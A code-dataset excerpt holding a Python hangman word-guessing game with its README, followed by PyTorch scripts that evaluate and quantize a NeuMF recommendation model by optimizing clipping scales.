"text": "# creating a dictionary function\r\ndef meaning(word):\r\n \r\n # words definition\r\n sevenDef = \"equivalent to the sum of three and four\"\r\n worldDef = \"the earth, together with all of its countries and peoples\"\r\n aboutDef = \"used to indicate movement within a particular area\"\r\n againDef = \"another time; once more\"\r\n heartDef = \"a hollow muscular organ that pumps the blood through the circulatory system\"\r\n pizzaDef = \"a dish of Italian origin, consisting of a flat round base of dough baked with a topping of tomatoes and cheese\"\r\n waterDef = \"a colourless, transparent, odourless, liquid\"\r\n happyDef = \"feeling or showing pleasure or contentment\"\r\n sixtyDef = \"the number equivalent to the product of six and ten\"\r\n boardDef = \"a long, thin, flat piece of wood or other hard material\"\r\n monthDef = \"each of the twelve named periods into which a year is divided\"\r\n angelDef = \"a spiritual being believed to act as an attendant, agent, or messenger of God\"\r\n deathDef = \"the action or fact of being killed\"\r\n greenDef = \"of the colour between blue and yellow in the spectrum\"\r\n musicDef = \"vocal or instrumental sounds combined to produce harmony\"\r\n fiftyDef = \"the number equivalent to the product of five and ten\"\r\n threeDef = \"equivalent to the sum of one and two\"\r\n partyDef = \"a social gathering of invited guests\"\r\n pianoDef = \"a large keyboard musical instrument with a wooden case\"\r\n tigerDef = \"a very large solitary cat with a yellow-brown coat striped with black\"\r\n faithDef = \"complete trust or confidence in someone or something\"\r\n earthDef = \"the planet on which we live\"\r\n riverDef = \"a large natural stream of water flowing in a channel to the sea\"\r\n moneyDef = \"a current medium of exchange\"\r\n peaceDef = \"freedom from disturbance\"\r\n fortyDef = \"the number equivalent to the product of four and ten\"\r\n smileDef = \"a pleased, kind, or amused facial expression\"\r\n abateDef = \"make (something) less intense\"\r\n houseDef = \"a building for human habitation\"\r\n aloneDef = \"having no one else present\"\r\n watchDef = \"look at or observe attentively over a period of time\"\r\n lemonDef = \"a pale yellow oval citrus fruit with thick skin and fragrant\"\r\n southDef = \"the direction towards the point of the horizon 90° clockwise from east\"\r\n ericaDef = \"a plant of the genus family Ericaceae \"\r\n animeDef = \"a style of Japanese film and television animation\"\r\n afterDef = \"in the time following an event or another period of time\"\r\n womanDef = \"an adult human female\"\r\n santaDef = \"legendary patron saint of children, commonly identified with Saint Nicholas\"\r\n stoneDef = \"hard solid non-metallic mineral matter of which rock is made\"\r\n chinaDef = \"a fine white or translucent vitrified ceramic material\"\r\n bloodDef = \"the red liquid that circulates in the arteries and veins of humans and other vertebrate animals\"\r\n mouthDef = \"the opening and cavity in the lower part of the human face\"\r\n sugarDef = \"a sweet crystalline substance obtained from various plants\"\r\n amberDef = \"hard translucent fossilized resin originating from extinct coniferous trees of the Tertiary period\"\r\n dreamDef = \"a series of thoughts, images, and sensations occurring in a person's mind during sleep.\"\r\n appleDef = \"the round fruit of a tree of the rose family, which typically has thin green or red skin and crisp flesh.\"\r\n laughDef = \"make the spontaneous sounds and movements of the face and body that are the instinctive expressions of lively amusement and sometimes also of derision\"\r\n error = \"We ran into a problem :( please close this app and try again\"\r\n if word == \"seven\":\r\n return sevenDef\r\n elif word == \"world\":\r\n return worldDef\r\n elif word == \"about\":\r\n return aboutDef\r\n elif word == \"again\":\r\n return againDef\r\n elif word == \"pizza\":\r\n return pizzaDef\r\n elif word == \"heart\":\r\n return heartDef\r\n elif word == \"water\":\r\n return waterDef\r\n elif word == \"happy\":\r\n return happyDef\r\n elif word == \"sixty\":\r\n return sixtyDef\r\n elif word == \"board\":\r\n return boardDef\r\n elif word == \"month\":\r\n return monthDef\r\n elif word == \"angel\":\r\n return angelDef\r\n elif word == \"death\":\r\n return deathDef\r\n elif word == \"green\":\r\n return greenDef\r\n elif word == \"music\":\r\n return musicDef\r\n elif word == \"fifty\":\r\n return fiftyDef\r\n elif word == \"three\":\r\n return threeDef\r\n elif word == \"party\":\r\n return partyDef\r\n elif word == \"piano\":\r\n return pianoDef\r\n elif word == \"mouth\":\r\n return mouthDef\r\n elif word == \"woman\":\r\n return womanDef\r\n elif word == \"sugar\":\r\n return sugarDef\r\n elif word == \"amber\":\r\n return amberDef\r\n elif word == \"dream\":\r\n return dreamDef\r\n elif word == \"apple\":\r\n return appleDef\r\n elif word == \"laugh\":\r\n return laughDef\r\n elif word == \"tiger\":\r\n return tigerDef\r\n elif word == \"faith\":\r\n return faithDef\r\n elif word == \"earth\":\r\n return earthDef\r\n elif word == \"river\":\r\n return riverDef\r\n elif word == \"money\":\r\n return moneyDef\r\n elif word == \"peace\":\r\n return peaceDef\r\n elif word == \"forty\":\r\n return fortyDef\r\n elif word == \"smile\":\r\n return smileDef\r\n elif word == \"abate\":\r\n return abateDef\r\n elif word == \"house\":\r\n return houseDef\r\n elif word == \"alone\":\r\n return aloneDef\r\n elif word == \"watch\":\r\n return watchDef\r\n elif word == \"lemon\":\r\n return lemonDef\r\n elif word == \"south\":\r\n return southDef\r\n elif word == \"erica\":\r\n return ericaDef\r\n elif word == \"anime\":\r\n return animeDef\r\n elif word == \"after\":\r\n return afterDef\r\n elif word == \"santa\":\r\n return santaDef\r\n elif word == \"stone\":\r\n return stoneDef\r\n elif word == \"china\":\r\n return chinaDef\r\n elif word == \"blood\":\r\n return bloodDef\r\n else:\r\n return error\r\n"
},
{
"alpha_fraction": 0.7817460298538208,
"alphanum_fraction": 0.7817460298538208,
"avg_line_length": 49.400001525878906,
"blob_id": "c4828442522e66ba1f05c77353dca64615753d4b",
"content_id": "76c086adb7d5cc1b14536fb229bed7fd9daea164",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 252,
"license_type": "no_license",
"max_line_length": 151,
"num_lines": 5,
"path": "/README.md",
"repo_name": "differentkaro/Hangman-Next",
"src_encoding": "UTF-8",
"text": "### About Hangman Next\nHangman Next is the next level for the classic Hangman game introducing score, levels, live and highscore just like any regular mobile and pc games are\n\n### Contact or Support\nyou can contact the developer KARO via mail: [email protected]\n"
},
{
"alpha_fraction": 0.32270917296409607,
"alphanum_fraction": 0.32706671953201294,
"avg_line_length": 52.27027130126953,
"blob_id": "4e2217cd5c035250a59b3a4b1fc09a2681c54f8f",
"content_id": "e7011b1644f32c8c5c100934cfa2c21b9d502dde",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8796,
"license_type": "no_license",
"max_line_length": 150,
"num_lines": 148,
"path": "/wordsGame.py",
"repo_name": "differentkaro/Hangman-Next",
"src_encoding": "UTF-8",
"text": "import words\r\nimport random\r\n\r\n#declaring variableS\r\nwordsToGuess = [\"seven\", \"world\", \"about\", \"again\", \"heart\", \"pizza\", \"water\", \"happy\", \"sixty\", \"board\",\r\n \"month\", \"angel\", \"death\", \"green\", \"music\", \"fifty\", \"three\", \"party\", \"piano\", \"mouth\", \"woman\", \"sugar\",\r\n \"amber\", \"dream\", \"apple\", \"laugh\", \"tiger\", \"faith\", \"earth\", \"river\", \"money\", \"peace\", \"forty\", \"smile\", \"abate\", \"house\", \"alone\",\r\n \"watch\", \"lemon\", \"south\", \"erica\", \"anime\", \"after\", \"santa\", \"stone\", \"china\", \"blood\"]\r\nscore = 0\r\nlife = 5\r\npicture0 = \"\"\"\r\n =============================================\r\n ░█──░█ ░█▀▀▀█ ░█─░█ ░█──░█ ░█▀▀▀█ ░█▄─░█ █ \r\n ░█▄▄▄█ ░█──░█ ░█─░█ ░█░█░█ ░█──░█ ░█░█░█ ▀ \r\n ──░█── ░█▄▄▄█ ─▀▄▄▀ ░█▄▀▄█ ░█▄▄▄█ ░█──▀█ ▄\r\n =============================================\r\n\"\"\"\r\npicture1 = \"\"\"\r\n +----+ =========================================================\r\n | ┃ ░█▀▀█ ─█▀▀█ ░█▀▄▀█ ░█▀▀▀ ░█▀▀▀█ ░█──░█ ░█▀▀▀ ░█▀▀█ █ \r\n O ┃ ░█─▄▄ ░█▄▄█ ░█░█░█ ░█▀▀▀ ░█──░█ ─░█░█─ ░█▀▀▀ ░█▄▄▀ ▀ \r\n /|\\ ┃ ░█▄▄█ ░█─░█ ░█──░█ ░█▄▄▄ ░█▄▄▄█ ──▀▄▀─ ░█▄▄▄ ░█─░█ ▄ \r\n / \\ ===========================================================\r\n ┃\r\n =========\r\n\"\"\"\r\n\r\n\r\n#main code\r\n\r\nprint(\"\"\"\r\n =======================================================\r\n F.I.V.E L.E.T.T.E.R V1.05\r\n =======================================================\r\n ░█─░█ ─ ─█▀▀█ ─ ░█▄─░█ ─ ░█▀▀█ ─ ░█▀▄▀█ ─ ─█▀▀█ ─ ░█▄─░█ \r\n ░█▀▀█ ▄ ░█▄▄█ ▄ ░█░█░█ ▄ ░█─▄▄ ▄ ░█░█░█ ▄ ░█▄▄█ ▄ ░█░█░█ \r\n ░█─░█ █ ░█─░█ █ ░█──▀█ █ ░█▄▄█ █ ░█──░█ █ ░█─░█ █ ░█──▀█\r\n ========================================================\r\n \"\"\")\r\n#welcome texts\r\nprint(\"welcome to the five letter Hangman guessing game!\")\r\nprint(\"You would be given a defination of a 5 letter word and youll have to guess all 5 possible letters that could be found in the word\")\r\nprint(\"you get one(1) point on correctly getting each letter and get and extra life at the completion of each word\")\r\nprint(\"by default you have 0 score and 5 lives. enter \\\"exit\\\" to exit at any point of the game\")\r\nwith open('score.txt', 'r') as high:\r\n highScore = int(high.read())\r\n print(\"Your High Score is \", highScore)\r\nwhile \"true\": #main game starts here\r\n option = input(\"\\nenter \\\"start\\\" to start or \\\"exit\\\" to exit or \\\"reset\\\" to reset your high score \\n\")\r\n if option.lower() == \"start\":\r\n selectedWord = \"\"\r\n used = [\"\"]\r\n while \"true\":\r\n if len(used) <= 47:\r\n if life < 1:\r\n score = 0\r\n life = 5\r\n break\r\n else:\r\n while selectedWord in used:\r\n selectedWord = random.choice(wordsToGuess)\r\n used.append(selectedWord)\r\n print(\"Guess the possible letters found in the word with the defination:\", words.meaning(selectedWord))\r\n chosen = [\"\"]\r\n blanks = \"_\" * 5\r\n while \"true\":\r\n if life < 1:\r\n print(picture1)\r\n print(\"Game Over! Sorry you have no lifes left. The correct answer is\", selectedWord)\r\n if score > highScore:\r\n with open('score.txt', 'r+') as high:\r\n high.write(str(score))\r\n highScore = score\r\n print(\"You Have a new High Score!\")\r\n print(\"your score is \", score)\r\n print(\"play again?\")\r\n break\r\n if len(chosen) >= 6:\r\n break\r\n else:\r\n print(blanks)\r\n answer = input()\r\n answer = answer.lower()\r\n if answer == \"exit\":\r\n print(\"Hangman would now exit...\")\r\n exit()\r\n else:\r\n if len(answer) != 1:\r\n print(\"sorry! try again, please enter one letter only\")\r\n elif answer not in \"abcdefghijklmnopqrstuvwxyz\":\r\n print(\"sorry! try again, please enter a letter\")\r\n else:\r\n if answer in chosen:\r\n print(\"letter has been entered previously, enter a new letter\")\r\n else:\r\n for i in range(5):\r\n if selectedWord[i] in answer:\r\n blanks = blanks[:i] + selectedWord[i] + blanks[i + 1:]\r\n if answer in selectedWord:\r\n score += 1\r\n if len(chosen) >= 5:\r\n if score == 4:\r\n score += 1\r\n life += 1\r\n print(\"Congratulations! you finished this word, your score is\", score,\r\n \" and you now have\", life, \" life! Try out the next word!\")\r\n chosen.append(answer)\r\n else:\r\n if blanks == selectedWord:\r\n score += 1\r\n life += 1\r\n print(\"Congratulations! you finished this word\", selectedWord,\r\n \"your score is\", score, \" and you now have\", life,\r\n \" life! Try out the next word!\")\r\n chosen.append(answer)\r\n chosen.append(answer)\r\n else:\r\n print(\"that is correct!, your score is\", score,\r\n \". now enter another possible letter\")\r\n chosen.append(answer)\r\n else:\r\n life -= 1\r\n if life > 0:\r\n print(\"that is wrong! you have\", life, \" life(s) left. Try again!\")\r\n else:\r\n print(picture0)\r\n if score > highScore:\r\n with open('score.txt', 'r+') as high:\r\n high.write(str(score))\r\n highScore = score\r\n print(\"You Have a new High Score!\")\r\n print(\"your score is \", score)\r\n print(\"Play again?\")\r\n break\r\n \r\n elif option.lower() == \"exit\":\r\n print(\"Hangman would now exit...\")\r\n exit()\r\n elif option.lower() == \"reset\":\r\n with open('score.txt', 'w') as high:\r\n high.write(' ')\r\n with open('score.txt', 'r+') as high:\r\n high.write('0')\r\n with open('score.txt', 'r') as high:\r\n resetHighScore = high.read()\r\n print(\"Your high score has been reset. Your new high score is \", resetHighScore)\r\n else:\r\n print(\"entry not understood, please try again!\")\r\n"
}
] | 3 |
ynahshan/training | https://github.com/ynahshan/training | fff1246462af1327fc71d52eff57c55883c5e0df | abf620bc646a704602207f43b706b0655b2517d4 | db83df76d9f536e005d36cccb4cb64c3e19eb539 | refs/heads/master | 2020-07-31T08:35:44.222042 | 2019-10-02T05:55:07 | 2019-10-02T05:55:07 | 210,546,893 | 0 | 0 | null | 2019-09-24T08:06:32 | 2019-09-23T19:18:26 | 2019-09-19T15:27:57 | null | [
{
"alpha_fraction": 0.6133173704147339,
"alphanum_fraction": 0.6217904686927795,
"avg_line_length": 36.32907485961914,
"blob_id": "4a76eb02a6d9c0d2e3584303bc766f2f8e5b0d01",
"content_id": "7dc1d8004ea68046340dd0d29800b74968c23f66",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 11684,
"license_type": "permissive",
"max_line_length": 123,
"num_lines": 313,
"path": "/recommendation/pytorch/layer_scale_optimization.py",
"repo_name": "ynahshan/training",
"src_encoding": "UTF-8",
"text": "import torch\nimport torch.nn as nn\nimport os\nimport sys\nimport numpy as np\nfrom tqdm import tqdm\nimport math\nfrom neumf import NeuMF\nimport random\nimport torch.backends.cudnn as cudnn\nfrom itertools import count\nfrom pathlib import Path\n\nsys.path.insert(0, '/home/cvds_lab/yury/mxt-experiments/nn-quantization-pytorch')\nfrom quantization.quantizer import ModelQuantizer\nfrom quantization.posttraining.module_wrapper import ActivationModuleWrapperPost, ParameterModuleWrapperPost\nfrom quantization.methods.clipped_uniform import FixedClipValueQuantization\nfrom utils.mllog import MLlogger\nimport scipy.optimize as opt\n\n\ndef save_data(data_, fname):\n with open(fname, 'wb') as f:\n pickle.dump(data_, f)\n\ndef load_data(fname):\n with open(fname, 'rb') as f:\n data_ = pickle.load(f)\n return data_\n\n\n\nfrom argparse import ArgumentParser\nimport pickle\n\ndef parse_args():\n parser = ArgumentParser(description=\"Validate a Nerual Collaborative\"\n \" Filtering model\")\n parser.add_argument('--data', type=str,\n help='path to test data files')\n parser.add_argument('--no-cuda', action='store_true',\n help='use available GPUs')\n parser.add_argument('--seed', '-s', type=int, default=0,\n help='manually set random seed for torch')\n parser.add_argument('--load_ckp', type=str, default=None,\n help='Path to load checkpoint from.')\n\n parser.add_argument('--quantize', '-q', action='store_true', help='Enable quantization', default=False)\n parser.add_argument('--experiment', '-exp', help='Name of the experiment', default='default')\n parser.add_argument('--bit_weights', '-bw', type=int, help='Number of bits for weights', default=None)\n parser.add_argument('--bit_act', '-ba', type=int, help='Number of bits for activations', default=None)\n parser.add_argument('--pre_relu', dest='pre_relu', action='store_true', help='use pre-ReLU quantization')\n parser.add_argument('--qtype', default='max_static', help='Type of quantization method')\n parser.add_argument('-lp', type=float, help='p parameter of Lp norm', default=3.)\n\n parser.add_argument('--min_method', '-mm', help='Minimization method to use [Nelder-Mead, Powell, COBYLA]',\n default='Powell')\n parser.add_argument('--maxiter', '-maxi', type=int, help='Maximum number of iterations to minimize algo',\n default=None)\n parser.add_argument('--maxfev', '-maxf', type=int, help='Maximum number of function evaluations of minimize algo',\n default=None)\n\n parser.add_argument('--init_method', default='static',\n help='Scale initialization method [static, dynamic, random], default=static')\n parser.add_argument('-siv', type=float, help='Value for static initialization', default=1.)\n\n parser.add_argument('--dont_fix_np_seed', '-dfns', action='store_true',\n help='Do not fix np seed even if seed specified')\n\n return parser.parse_args()\n\n\ndef data_loader(path):\n # load data:\n print('Data loading ...')\n data_ = load_data(path)\n test_users = []\n test_items = []\n dup_mask = []\n real_indices = []\n for i in tqdm(range(len(data_['test_users']))):\n test_users.append(torch.tensor(data_['test_users'][i]))\n test_items.append(torch.tensor(data_['test_items'][i]))\n dup_mask.append(torch.tensor(data_['dup_mask'][i]))\n real_indices.append(torch.tensor(data_['real_indices'][i]))\n\n K = data_['K']\n samples_per_user = data_['samples_per_user']\n num_user = data_['num_user']\n\n return test_users, test_items, dup_mask, real_indices, K, samples_per_user, num_user\n\n\nclass NcfData(object):\n def __init__(self, test_users, test_items, dup_mask, real_indices, K, samples_per_user, num_user):\n self.test_users = test_users\n self.test_items = test_items\n self.dup_mask = dup_mask\n self.real_indices = real_indices\n self.K = K\n self.samples_per_user = samples_per_user\n self.num_user = num_user\n\n def get_subset(self, N):\n return NcfData(self.test_users[:N], self.test_items[:N], self.dup_mask[:N], self.real_indices[:N], self.K,\n self.samples_per_user, self.num_user)\n\n def remove_last(self, N):\n return NcfData(self.test_users[N:], self.test_items[N:], self.dup_mask[N:], self.real_indices[N:], self.K,\n self.samples_per_user, self.num_user)\n\n\nclass CalibrationSet(object):\n def __init__(self, f_path):\n data_ = torch.load(f_path)\n self.users = data_['users']\n self.items = data_['items']\n self.labels = data_['labels']\n\n def cuda(self):\n self.users = self.users.cuda()\n self.items = self.items.cuda()\n self.labels = self.labels.cuda()\n return self\n\n def split(self, batch_size):\n self.users = self.users.split(batch_size)\n self.items = self.items.split(batch_size)\n self.labels = self.labels.split(batch_size)\n\n\ndef set_clipping(mq, clipping, device, verbose=False):\n qwrappers = mq.get_qwrappers()\n for i, qwrapper in enumerate(qwrappers):\n qwrapper.set_quantization(FixedClipValueQuantization,\n {'clip_value': clipping[i], 'device': device}, verbose=verbose)\n\n\ndef get_clipping(mq):\n clipping = []\n qwrappers = mq.get_qwrappers()\n for i, qwrapper in enumerate(qwrappers):\n q = qwrapper.get_quantization()\n clip_value = getattr(q, 'alpha')\n clipping.append(clip_value)\n\n return np.array(clipping)\n\n\ndef val(model, data):\n print('Validation ...')\n log_2 = math.log(2)\n\n model.eval()\n hits = torch.tensor(0., device='cuda')\n ndcg = torch.tensor(0., device='cuda')\n\n with torch.no_grad():\n list_ = list(enumerate(zip(data.test_users, data.test_items)))\n for i, (u,n) in tqdm(list_):\n res = model(u.cuda().view(-1), n.cuda().view(-1), sigmoid=True).detach().view(-1, data.samples_per_user)\n # set duplicate results for the same item to -1 before topk\n res[data.dup_mask[i]] = -1\n out = torch.topk(res, data.K)[1]\n # topk in pytorch is stable(if not sort)\n # key(item):value(predicetion) pairs are ordered as original key(item) order\n # so we need the first position of real item(stored in real_indices) to check if it is in topk\n ifzero = (out == data.real_indices[i].cuda().view(-1,1))\n hits_ = ifzero.sum()\n ndcg_ = (log_2 / (torch.nonzero(ifzero)[:, 1].view(-1).to(torch.float)+2).log_()).sum()\n hits += hits_\n ndcg += ndcg_\n\n hits = hits.item()\n ndcg = ndcg.item()\n\n return hits / data.num_user, ndcg / data.num_user\n\n\ndef evaluate_calibration(model, cal_data, criterion):\n total_loss = torch.tensor([0.]).cuda()\n for i in range(len(cal_data.users)):\n outputs = model(cal_data.users[i].view(-1), cal_data.items[i].view(-1), sigmoid=True)\n loss = criterion(outputs.view(-1), cal_data.labels[i])\n total_loss += loss\n\n loss = total_loss.item() / len(cal_data.users)\n return loss\n\n\ndef validate(model, data):\n hr, ndcg = val(model, data)\n print('')\n print('')\n print('HR@{K} = {hit_rate:.4f}, NDCG@{K} = {ndcg:.4f}'\n .format(K=data.K, hit_rate=hr, ndcg=ndcg))\n return hr, ndcg\n\n\n_eval_count = count(0)\n_min_loss = 1e6\ndef run_inference_on_calibration(scales, model, mq, cal_data, criterion):\n global _eval_count, _min_loss\n eval_count = next(_eval_count)\n\n set_clipping(mq, scales, model.device, verbose=(eval_count % 300 == 0))\n loss = evaluate_calibration(model, cal_data, criterion)\n\n if loss < _min_loss:\n _min_loss = loss\n\n print_freq = 20\n if eval_count % 20 == 0:\n print(\"func eval iteration: {}, minimum loss of last {} iterations: {:.4f}\".format(\n eval_count, print_freq, _min_loss))\n\n return loss\n\n\ndef main(args, ml_logger):\n # Fix the seed\n random.seed(args.seed)\n if not args.dont_fix_np_seed:\n np.random.seed(args.seed)\n torch.manual_seed(args.seed)\n torch.cuda.manual_seed_all(args.seed)\n cudnn.deterministic = True\n torch.backends.cudnn.benchmark = False\n\n # Check that GPUs are actually available\n use_cuda = not args.no_cuda and torch.cuda.is_available()\n\n # Create model\n model = NeuMF(2197225, 855776,\n mf_dim=64, mf_reg=0.,\n mlp_layer_sizes=[256, 256, 128, 64],\n mlp_layer_regs=[0. for i in [256, 256, 128, 64]])\n\n print(model)\n\n if use_cuda:\n # Move model and loss to GPU\n model = model.cuda()\n model.device = torch.device('cuda:{}'.format(0))\n\n if args.load_ckp:\n ckp = torch.load(args.load_ckp)\n model.load_state_dict(ckp)\n\n all_embeding = [n for n, m in model.named_modules() if isinstance(m, nn.Embedding)]\n all_linear = [n for n, m in model.named_modules() if isinstance(m, nn.Linear)]\n all_relu = [n for n, m in model.named_modules() if isinstance(m, nn.ReLU)]\n all_relu6 = [n for n, m in model.named_modules() if isinstance(m, nn.ReLU6)]\n layers = all_relu + all_relu6 + all_linear + all_embeding\n replacement_factory = {nn.ReLU: ActivationModuleWrapperPost,\n nn.ReLU6: ActivationModuleWrapperPost,\n nn.Linear: ParameterModuleWrapperPost,\n nn.Embedding: ActivationModuleWrapperPost}\n mq = ModelQuantizer(model, args, layers, replacement_factory)\n # mq.log_quantizer_state(ml_logger, -1)\n\n test_users, test_items, dup_mask, real_indices, K, samples_per_user, num_user = data_loader(args.data)\n data = NcfData(test_users, test_items, dup_mask, real_indices, K, samples_per_user, num_user)\n cal_data = CalibrationSet('ml-20mx16x32/cal_set').cuda()\n cal_data.split(batch_size=10000)\n\n criterion = nn.BCEWithLogitsLoss(reduction='mean')\n criterion = criterion.cuda()\n\n print(\"init_method: {}, qtype {}\".format(args.init_method, args.qtype))\n # evaluate to initialize dynamic clipping\n loss = evaluate_calibration(model, cal_data, criterion)\n print(\"Initial loss: {:.4f}\".format(loss))\n\n # get clipping values\n init = get_clipping(mq)\n\n # evaluate\n hr, ndcg = validate(model, data)\n ml_logger.log_metric('HR init', hr, step='auto')\n\n # run optimizer\n min_options = {}\n if args.maxiter is not None:\n min_options['maxiter'] = args.maxiter\n if args.maxfev is not None:\n min_options['maxfev'] = args.maxfev\n\n _iter = count(0)\n\n def local_search_callback(x):\n it = next(_iter)\n loss = run_inference_on_calibration(x, model, mq, cal_data, criterion)\n print(\"\\n[{}]: Local search callback\".format(it))\n print(\"loss: {:.4f}\\n\".format(loss))\n\n res = opt.minimize(lambda scales: run_inference_on_calibration(scales, model, mq, cal_data, criterion), np.array(init),\n method=args.min_method, options=min_options, callback=local_search_callback)\n\n print(res)\n scales = res.x\n set_clipping(mq, scales, model.device)\n # evaluate\n hr, ndcg = validate(model, data)\n ml_logger.log_metric('HR Powell', hr, step='auto')\n # save scales\n\nhome = str(Path.home())\nif __name__ == '__main__':\n args = parse_args()\n with MLlogger(os.path.join(home, 'mxt-sim/mllog_runs'), args.experiment, args,\n name_args=['NCF', '1B', \"W{}A{}\".format(args.bit_weights, args.bit_act)]) as ml_logger:\n main(args, ml_logger)\n"
},
{
"alpha_fraction": 0.5963220000267029,
"alphanum_fraction": 0.605818510055542,
"avg_line_length": 36.908573150634766,
"blob_id": "05eeb113f163722bb45410ed991ddbb186f9ad88",
"content_id": "12ffaff6ce5f9b4a0111bf072b38812a718577a7",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6634,
"license_type": "permissive",
"max_line_length": 116,
"num_lines": 175,
"path": "/recommendation/pytorch/eval_ncf.py",
"repo_name": "ynahshan/training",
"src_encoding": "UTF-8",
"text": "import torch\nimport torch.nn as nn\nimport os\nimport sys\nimport numpy as np\nfrom tqdm import tqdm\nimport math\nfrom neumf import NeuMF\nimport pickle\n\nsys.path.append('/home/cvds_lab/yury/mxt-experiments/nn-quantization-pytorch')\nfrom quantization.quantizer import ModelQuantizer\nfrom quantization.posttraining.module_wrapper import ActivationModuleWrapperPost, ParameterModuleWrapperPost\n\n\ndef save_data(data_, fname):\n with open(fname, 'wb') as f:\n pickle.dump(data_, f)\n\ndef load_data(fname):\n with open(fname, 'rb') as f:\n data_ = pickle.load(f)\n return data_\n\n\n\nfrom argparse import ArgumentParser\nimport pickle\n\ndef parse_args():\n parser = ArgumentParser(description=\"Validate a Nerual Collaborative\"\n \" Filtering model\")\n parser.add_argument('--data', type=str,\n help='path to test data files')\n parser.add_argument('--no-cuda', action='store_true',\n help='use available GPUs')\n parser.add_argument('--seed', '-s', type=int,\n help='manually set random seed for torch')\n parser.add_argument('--load_ckp', type=str, default=None,\n help='Path to load checkpoint from.')\n\n parser.add_argument('--quantize', '-q', action='store_true', help='Enable quantization', default=False)\n parser.add_argument('--experiment', '-exp', help='Name of the experiment', default='default')\n parser.add_argument('--bit_weights', '-bw', type=int, help='Number of bits for weights', default=None)\n parser.add_argument('--bit_act', '-ba', type=int, help='Number of bits for activations', default=None)\n parser.add_argument('--pre_relu', dest='pre_relu', action='store_true', help='use pre-ReLU quantization')\n parser.add_argument('--qtype', default='max_static', help='Type of quantization method')\n parser.add_argument('-lp', type=float, help='p parameter of Lp norm', default=3.)\n\n return parser.parse_args()\n\n\ndef data_loader(path):\n # load data:\n print('Data loading ...')\n data_ = load_data(path)\n test_users = []\n test_items = []\n dup_mask = []\n real_indices = []\n for i in tqdm(range(len(data_['test_users']))):\n test_users.append(torch.tensor(data_['test_users'][i]))\n test_items.append(torch.tensor(data_['test_items'][i]))\n dup_mask.append(torch.tensor(data_['dup_mask'][i]))\n real_indices.append(torch.tensor(data_['real_indices'][i]))\n\n K = data_['K']\n samples_per_user = data_['samples_per_user']\n num_user = data_['num_user']\n\n return test_users, test_items, dup_mask, real_indices, K, samples_per_user, num_user\n\n\nclass NcfData(object):\n def __init__(self, test_users, test_items, dup_mask, real_indices, K, samples_per_user, num_user):\n self.test_users = test_users\n self.test_items = test_items\n self.dup_mask = dup_mask\n self.real_indices = real_indices\n self.K = K\n self.samples_per_user = samples_per_user\n self.num_user = num_user\n\n def get_subset(self, N):\n return NcfData(self.test_users[:N], self.test_items[:N], self.dup_mask[:N], self.real_indices[:N], self.K,\n self.samples_per_user, self.num_user)\n\n def remove_last(self, N):\n return NcfData(self.test_users[N:], self.test_items[N:], self.dup_mask[N:], self.real_indices[N:], self.K,\n self.samples_per_user, self.num_user)\n\n\ndef val(model, data):\n print('Validation ...')\n log_2 = math.log(2)\n\n model.eval()\n hits = torch.tensor(0., device='cuda')\n ndcg = torch.tensor(0., device='cuda')\n\n with torch.no_grad():\n list_ = list(enumerate(zip(data.test_users, data.test_items)))\n for i, (u,n) in tqdm(list_):\n res = model(u.cuda().view(-1), n.cuda().view(-1), sigmoid=True).detach().view(-1, data.samples_per_user)\n # set duplicate results for the same item to -1 before topk\n res[data.dup_mask[i]] = -1\n out = torch.topk(res, data.K)[1]\n # topk in pytorch is stable(if not sort)\n # key(item):value(predicetion) pairs are ordered as original key(item) order\n # so we need the first position of real item(stored in real_indices) to check if it is in topk\n ifzero = (out == data.real_indices[i].cuda().view(-1,1))\n hits_ = ifzero.sum()\n ndcg_ = (log_2 / (torch.nonzero(ifzero)[:,1].view(-1).to(torch.float)+2).log_()).sum()\n hits += hits_\n ndcg += ndcg_\n\n hits = hits.item()\n ndcg = ndcg.item()\n\n return hits / data.num_user, ndcg / data.num_user\n\n\ndef main():\n args = parse_args()\n\n if args.seed is not None:\n print(\"Using seed = {}\".format(args.seed))\n torch.manual_seed(args.seed)\n np.random.seed(seed=args.seed)\n\n # Check that GPUs are actually available\n use_cuda = not args.no_cuda and torch.cuda.is_available()\n\n # Create model\n model = NeuMF(2197225, 855776,\n mf_dim=64, mf_reg=0.,\n mlp_layer_sizes=[256, 256, 128, 64],\n mlp_layer_regs=[0. for i in [256, 256, 128, 64]])\n\n print(model)\n\n if use_cuda:\n # Move model and loss to GPU\n model = model.cuda()\n\n if args.load_ckp:\n ckp = torch.load(args.load_ckp)\n model.load_state_dict(ckp)\n\n if args.quantize:\n all_embeding = [n for n, m in model.named_modules() if isinstance(m, nn.Embedding)]\n all_linear = [n for n, m in model.named_modules() if isinstance(m, nn.Linear)]\n all_relu = [n for n, m in model.named_modules() if isinstance(m, nn.ReLU)]\n all_relu6 = [n for n, m in model.named_modules() if isinstance(m, nn.ReLU6)]\n # layers = all_relu + all_relu6 + all_linear\n layers = all_embeding\n replacement_factory = {nn.ReLU: ActivationModuleWrapperPost,\n nn.ReLU6: ActivationModuleWrapperPost,\n nn.Linear: ParameterModuleWrapperPost,\n nn.Embedding: ActivationModuleWrapperPost}\n mq = ModelQuantizer(model, args, layers, replacement_factory)\n # mq.log_quantizer_state(ml_logger, -1)\n\n test_users, test_items, dup_mask, real_indices, K, samples_per_user, num_user = data_loader(args.data)\n data = NcfData(test_users, test_items, dup_mask, real_indices, K, samples_per_user, num_user)\n\n hr, ndcg = val(model, data)\n print('')\n print('')\n print('HR@{K} = {hit_rate:.4f}, NDCG@{K} = {ndcg:.4f}'\n .format(K=K, hit_rate=hr, ndcg=ndcg))\n\n\nif __name__ == '__main__':\n main()\n"
}
] | 2 |
true-datura/Django_view_and_templates_hw | https://github.com/true-datura/Django_view_and_templates_hw | 198889c362da0b5a6ee6b55c9363780e79a60845 | 0adcafb093611bcc56d26bfeeaf546592f582a54 | c9e3bb6b32ef0310ce9b127f1670f0c4c15eb8f3 | refs/heads/master | 2016-09-23T05:59:25.223486 | 2016-08-04T10:05:18 | 2016-08-04T10:05:18 | 64,746,622 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6278825998306274,
"alphanum_fraction": 0.6289308071136475,
"avg_line_length": 30.799999237060547,
"blob_id": "11092fd2e09a07daad285200aa210e8942b9de9f",
